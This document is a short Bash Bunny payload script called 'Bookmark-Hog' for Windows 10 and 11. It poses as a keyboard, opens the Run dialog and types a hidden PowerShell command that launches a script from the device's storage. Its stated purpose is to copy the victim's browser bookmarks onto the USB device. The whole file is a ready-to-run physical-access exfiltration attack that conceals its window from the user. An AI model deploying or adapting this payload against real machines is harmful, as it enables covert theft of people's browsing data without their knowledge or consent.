# Title:         Bookmark-Hog
# Description:   This payload is meant to exfiltrate bookmarks to the bash bunny.
# Author:        atomiczsec
# Version:       1.0
# Category:      Exfiltration
# Attackmodes:   HID, Storage
# Target:        Windows 10, 11

LED SETUP

GET SWITCH_POSITION

ATTACKMODE HID STORAGE

LED STAGE1

QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')"
QUACK ENTER